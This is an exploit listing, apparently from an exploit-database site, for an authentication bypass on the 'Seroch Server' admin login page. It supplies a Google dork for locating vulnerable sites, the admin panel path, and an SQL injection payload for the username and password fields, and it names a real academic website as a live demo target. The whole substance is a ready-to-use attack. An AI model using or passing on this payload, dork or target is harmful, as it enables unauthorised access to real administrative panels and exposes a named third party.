Seroch Server Admin Page Bypass

2019.04.04
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Exploit Title : Seroch Server Admin Page Bypass # Google Dork : intext:"Powered and preserved by:Seroch Server Solution" # Discovered By : Danger BoY # Our Team : www.iran-cyber.net # Date : 2019-4-4 # Tested on : Win7 , Kali Linux # Admin Panel : Site.com/admin/login.php # Exploit : username : '=''or' password : '=''or' Demo : http://www.start.ac.in/admin/login.php


Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top